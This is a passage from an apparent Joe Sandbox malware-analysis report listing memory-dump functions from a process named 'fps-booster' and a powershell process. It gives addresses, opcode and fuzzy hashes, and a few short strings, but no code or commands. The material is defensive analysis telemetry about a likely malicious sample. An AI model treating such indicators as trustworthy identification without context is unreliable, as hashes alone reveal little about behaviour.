              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e18204aee5b0abd0c82ab260cba04c8d3d5e911b802e7aafd836e1a8fa5d3055
              • Instruction ID: 796d49491b47bbd8a391cdc7d92f9bb9740956a93bc1acddb4a6a56e8517a504
              • Opcode Fuzzy Hash: e18204aee5b0abd0c82ab260cba04c8d3d5e911b802e7aafd836e1a8fa5d3055
              • Instruction Fuzzy Hash: 4CF0AC70D09248DFCB45DFE8D45459C7FB0AF45310F0044EED845A7361E6745A54CF81
              Function 0B2F2022 Relevance: .0, Instructions: 23COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7bafe2252fd6558b4912684f23487fbaab77833ec76645f51965b030aa803e57
              • Instruction ID: e0f6cc94bad5bc4db33d807593c1aff6454d3e44c675dc57e0e4de036425e674
              • Opcode Fuzzy Hash: 7bafe2252fd6558b4912684f23487fbaab77833ec76645f51965b030aa803e57
              • Instruction Fuzzy Hash: AFE0ED7090A288AFCB02DFB8D8A199C7FB1EF5A204B1506DED445DB112E6751E14DB51
              Function 0B2F1FAA Relevance: .0, Instructions: 21COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9001aba74fdcc03ed4598ebfbac0318ace7357fd707f1af1049b3318fe28819b
              • Instruction ID: fbc618f3c67e1db19478813e1ab8c2dfa6fcf96261b5377fccdb6d9bad6315c1
              • Opcode Fuzzy Hash: 9001aba74fdcc03ed4598ebfbac0318ace7357fd707f1af1049b3318fe28819b
              • Instruction Fuzzy Hash: B7E04F3061D2818FCB09CB38D8E4928BF71AE4A20430546EDD44BDB247D661A816CB11
              Function 0B2F1FF0 Relevance: .0, Instructions: 20COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1c4562f2dded78edca3143c40da2308b1f421612824cf4edfa71f458ed22ac0f
              • Instruction ID: 025855390a75ec7e32cd45e90f497f24323144d15bd6cc957809f3962d40cdca
              • Opcode Fuzzy Hash: 1c4562f2dded78edca3143c40da2308b1f421612824cf4edfa71f458ed22ac0f
              • Instruction Fuzzy Hash: 29D0A737304639970105369D741457E7ADFE6CD96A356003FF609CB341DD554C0183E5
              Function 0B2F29F8 Relevance: .0, Instructions: 19COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 990ef09a758f4f5cc9bc6c40ab28e344393c73def33305ef6c7a25d33ac8a0bd
              • Instruction ID: d962afdc30cfc454cbb7e7ff497d5d6645a9cd9bd981965f5ce271866981061c
              • Opcode Fuzzy Hash: 990ef09a758f4f5cc9bc6c40ab28e344393c73def33305ef6c7a25d33ac8a0bd
              • Instruction Fuzzy Hash: 58E09270E0520CEFCB44EFA8E45459DBBB5EB88300F0085A99809A7350EA346A548F81
              Function 0B2F6192 Relevance: .0, Instructions: 18COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9b85d8cea0bb3816335ddd4746d14e8bfede31c9966536f3fe1003fdfbef40cb
              • Instruction ID: 08759667dcb11b6eaca5f1b2c29301441d04b920950ca2680883560be895cf33
              • Opcode Fuzzy Hash: 9b85d8cea0bb3816335ddd4746d14e8bfede31c9966536f3fe1003fdfbef40cb
              • Instruction Fuzzy Hash: A7E0C231509292CFCB06CF28CC919643FB1AF1231472E40EED044CF673C225D916DB51
              Function 0B2F2030 Relevance: .0, Instructions: 16COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3479527f4af39898f8e08cf9d76542287b8db9234ce26b2753073a04d3dcdd1a
              • Instruction ID: e8adce754239e463655716a15971a3610b0dc7afd0e15804be62c0438ce5f6ac
              • Opcode Fuzzy Hash: 3479527f4af39898f8e08cf9d76542287b8db9234ce26b2753073a04d3dcdd1a
              • Instruction Fuzzy Hash: 84D05E70E0820DEFCB41EFB8E95159DBBF9EBA9314B5045ADE408D7200EA366F10DB90
              Function 0B2F6170 Relevance: .0, Instructions: 14COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ade6d1d70835f175b75b472c2a5586df3c59963c913928f9e553adcb15c79d98
              • Instruction ID: cb596426c0ca940d17e8a8c96da7d0bc060efbab907060deef01658a66549ee7
              • Opcode Fuzzy Hash: ade6d1d70835f175b75b472c2a5586df3c59963c913928f9e553adcb15c79d98
              • Instruction Fuzzy Hash: E0C080317411254FC704965DD410D5937DDDF49B24B0100B6F506CB771CE92EC4047D4
              Function 0B2F29C1 Relevance: .0, Instructions: 14COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c3fb1fad1efaa50c89aa72b0fe53f5f7d24a4fb3287c93d8342fdd0c7fbda00a
              • Instruction ID: 7bb73b0563f00c246bfd22f0f9ff0eaf2bc70e12f9761310d9003cdf368c5d1f
              • Opcode Fuzzy Hash: c3fb1fad1efaa50c89aa72b0fe53f5f7d24a4fb3287c93d8342fdd0c7fbda00a
              • Instruction Fuzzy Hash: D7D0523010A7888FC71ACF288AA09223B209E0B70070606CAE4898F262C1202928CB62
              Function 0B2F61A0 Relevance: .0, Instructions: 13COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: dd92ccad0458ed7f164ba59ab25cbb85215198a307a6d1f8b590fe2573129d85
              • Instruction ID: a6532995f7974c550550b2ca14382e41cd8ee317513f7e7ac9c50a0310c3003e
              • Opcode Fuzzy Hash: dd92ccad0458ed7f164ba59ab25cbb85215198a307a6d1f8b590fe2573129d85
              • Instruction Fuzzy Hash: 27D01232251907CFC7049E19C845A7477E5DF50615BA940F4E2088BA63C235D951D690
              Function 0B2FAE39 Relevance: .0, Instructions: 12COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6829a68cba6f51aecd53bb1aeb0752ab2785e354c1f35b55e6d7bce982ab2903
              • Instruction ID: dd7fc81bf4d767011cef04dbfd6ceb3d576b961a20f7d42da18cb37a7a50b362
              • Opcode Fuzzy Hash: 6829a68cba6f51aecd53bb1aeb0752ab2785e354c1f35b55e6d7bce982ab2903
              • Instruction Fuzzy Hash: 29D0222002C7CA8FC7035B34C8AC804BF39AF0B600B0500FAD582CB0C3CC1828048333
              Function 0B2FAE21 Relevance: .0, Instructions: 8COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: be435c2257c60ffa30ea17ddf7895d9eaa29b3a0b0b1bca16c3d4329fcd9ec73
              • Instruction ID: 04bc31253e26862db5c59ff9c11b752a6f4ab0d7ff174b17befff5394a829c79
              • Opcode Fuzzy Hash: be435c2257c60ffa30ea17ddf7895d9eaa29b3a0b0b1bca16c3d4329fcd9ec73
              • Instruction Fuzzy Hash: 19C04C355192D14FC7068B3888A09143B746E5320474514F69090DB5A2C314AD0ADB12
              Function 0B2FAE48 Relevance: .0, Instructions: 6COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c0eaa23945ee276af4c0d69e3d1d65c4119d1bdd36b8ad5412cd26cba48e5067
              • Instruction ID: f87f443c57e14ccaf3e8e1443134ad60e3434843b71bbca766b0f473bc4401b4
              • Opcode Fuzzy Hash: c0eaa23945ee276af4c0d69e3d1d65c4119d1bdd36b8ad5412cd26cba48e5067
              • Instruction Fuzzy Hash: FDB0122803478EC7C2402355D549118FD2E6B48600B4001316B1B012C34C54590010A7

              Non-executed Functions

              Function 0B2FA137 Relevance: 1.7, Strings: 1, Instructions: 426COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID: VC5?
              • API String ID: 0-2846446448
              • Opcode ID: 272cf12f5068ad6a4d8368eab4fe94dd5d0815ed66caf747f4e1c0a7e66b2c3b
              • Instruction ID: 292253f38040208eb72783efbe2b3b7b8c1980d4022992d68373271f47341f79
              • Opcode Fuzzy Hash: 272cf12f5068ad6a4d8368eab4fe94dd5d0815ed66caf747f4e1c0a7e66b2c3b
              • Instruction Fuzzy Hash: 46123774A2022ACFDB64DF64D9947DDBBB2FB49700F1080AAD54AA7344DB359E81CF81
              Function 0B2FA40F Relevance: 1.6, Strings: 1, Instructions: 371COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID: VC5?
              • API String ID: 0-2846446448
              • Opcode ID: 4d299049f74ed0edf35aaf3af0c227bbe826c4b0037ce62c1a4ff1157d0ca4f1
              • Instruction ID: 51eaffb6e3cf4de903dbfbee6d88ee92de517949ea137970a337c247b5455ecb
              • Opcode Fuzzy Hash: 4d299049f74ed0edf35aaf3af0c227bbe826c4b0037ce62c1a4ff1157d0ca4f1
              • Instruction Fuzzy Hash: 9112B274A1122A8FDB64DF68D9946D9BBB1FB49700F1081E9D94DA7344DB31AE81CF80
              Function 0B2F68F6 Relevance: 1.6, Strings: 1, Instructions: 359COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID: rXlS
              • API String ID: 0-3120032998
              • Opcode ID: 76fee1d6771331da70521a8076782b38028f10216bd2fa4f48a4ee639569e028
              • Instruction ID: 2067829eab514ed3aeae6f22b945ed493f7e253b8343eae8be0c9325c5b7eedf
              • Opcode Fuzzy Hash: 76fee1d6771331da70521a8076782b38028f10216bd2fa4f48a4ee639569e028
              • Instruction Fuzzy Hash: 0D020974A11229CFDB249F74D95866DBBB6FF88601F0045A9E84AE7380DF369E90CF41
              Function 0B2F97C7 Relevance: 1.4, Strings: 1, Instructions: 150COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID: VC5?
              • API String ID: 0-2846446448
              • Opcode ID: 5e9de84e14382a8211de7769e96f9b171b32289e8dde81459999fd4cff215187
              • Instruction ID: 47464d2b3ad8cd5d5d967f4a18d1bd391cf20ea1a18ba598b663d9b3520acffd
              • Opcode Fuzzy Hash: 5e9de84e14382a8211de7769e96f9b171b32289e8dde81459999fd4cff215187
              • Instruction Fuzzy Hash: D76170B4E2022BCBDB64CF64C8957AEBBB1FB49700F1144BAC55AA7240DB749E85CF40
              Function 0133F738 Relevance: .1, Instructions: 104COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2484301401.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1330000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0629ab20a69fe2405d6e648fe708cab33ee6dc397cf8b5f22a4101f01fe8e63d
              • Instruction ID: 0c7fcd5fd5e8a7696871942c2d3253eab0e345e07b1f9af59f978d811e221070
              • Opcode Fuzzy Hash: 0629ab20a69fe2405d6e648fe708cab33ee6dc397cf8b5f22a4101f01fe8e63d
              • Instruction Fuzzy Hash: 6941D735A20615CFC755CA2DC481A6BBBF9FBC4354F54882AE11ECBA60D334E944CF4A

              Executed Functions

              Function 049A29F0 Relevance: .2, Instructions: 209COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000002.00000002.2204049415.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_49a0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 29021ed6acade488c20f298c8818941b41fa994ffd9bfe976cdc3e2a009607c5
              • Instruction ID: 72e5afe62019ecc108c399ee84613f4d5bf0cadb119f5de7508add5dc20e5282
              • Opcode Fuzzy Hash: 29021ed6acade488c20f298c8818941b41fa994ffd9bfe976cdc3e2a009607c5
              • Instruction Fuzzy Hash: C991DC74A00209CFCB15CF58C484AAEFBB5FF88310B2486A9D915AB3A5C735FC51CBA0
              Function 049A6D8D Relevance: .2, Instructions: 169COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000002.00000002.2204049415.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_49a0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a28d167af9466620d68d78e93d8d2ca7f4b643bed35e1ff482eceb6e19558e46
              • Instruction ID: cf7f81c817a2f94ccb090d2b9c8a7c7b3157b1bb4b442d0f16465aafec0c0ea1
              • Opcode Fuzzy Hash: a28d167af9466620d68d78e93d8d2ca7f4b643bed35e1ff482eceb6e19558e46
              • Instruction Fuzzy Hash: DC21F435B001189FCB08DFA8D5949ADFBB2BF88310B29C5A5E905AB365DB31EC55CB90
              Function 049A2B00 Relevance: .1, Instructions: 108COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000002.00000002.2204049415.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_49a0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 78b8770d26680af3746709703c68a3a9204b9bac840a1b44c45bf91ff8ff1b88
              • Instruction ID: 16fd083ea155aea8d0ef4759de51ca352bd8621fdfb328f320b6065bb41fbc0b
              • Opcode Fuzzy Hash: 78b8770d26680af3746709703c68a3a9204b9bac840a1b44c45bf91ff8ff1b88
              • Instruction Fuzzy Hash: 4A412B74A00605DFCB05CF59C598AAAFBB5FF48310B1186A9D916AB364C736FC51CFA0
              Function 049A2C5C Relevance: .1, Instructions: 63COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000002.00000002.2204049415.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_49a0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: faffdadd0a7a6e8094a839fb1900179bde066c20aec2f82c1997ff5863bacc22
              • Instruction ID: 9dc49584943f84f7a5541759382c5a696e57bb71e941fac737ed4e4984a98115
              • Opcode Fuzzy Hash: faffdadd0a7a6e8094a839fb1900179bde066c20aec2f82c1997ff5863bacc22
              • Instruction Fuzzy Hash: D311B1349092949FC703DF6CD8B06E9BF70EF07324B1541D7D0519B2A2C626AD59CBA5
              Function 049A6DBC Relevance: .0, Instructions: 47COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000002.00000002.2204049415.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_49a0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 973bc0a46c5d5758e15d41d26caa55101c672b45e1582adb11f3eab8bcaf2a31
              • Instruction ID: 60641c633ce93d819d4215cfff05ec79bec2ea5db3b76bc80a2a21dbc5f39b5c
              • Opcode Fuzzy Hash: 973bc0a46c5d5758e15d41d26caa55101c672b45e1582adb11f3eab8bcaf2a31
              • Instruction Fuzzy Hash: 2611F339A011089FCB04DF99D59499DFBF2FF88310F25C5A5E904A7715D731AD91CBA0
              Function 02FAD01D Relevance: .0, Instructions: 45COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000002.00000002.2203680539.0000000002FAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FAD000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_2fad000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e43059b10a14f1086dd887b00f138663b0eae36a387c003c6b2afc8afe156251
              • Instruction ID: c547f8d78c9eba23680266a92a430bbfa437da554fff7a1e95f96bd33eea4cdf
              • Opcode Fuzzy Hash: e43059b10a14f1086dd887b00f138663b0eae36a387c003c6b2afc8afe156251
              • Instruction Fuzzy Hash: 1201F7B1504340EAE7104A25C995B67FF98EF41BA4F18C019DE480A64AC778A445C6B1
              Function 02FAD005 Relevance: .0, Instructions: 45COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000002.00000002.2203680539.0000000002FAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FAD000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_2fad000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d031aa2d98241bb44af24836ff4075bc13313f49907aaaf5cb4009e6f5b8aa2b
              • Instruction ID: ddde254314416b0d0209351436f22869a05174e749ed6fbacb0273a6405502f5
              • Opcode Fuzzy Hash: d031aa2d98241bb44af24836ff4075bc13313f49907aaaf5cb4009e6f5b8aa2b
              • Instruction Fuzzy Hash: 2F01927140E3C09FD7128B2588A4B52BFB4EF53624F1DC0CBD9888F1A7C2695849C772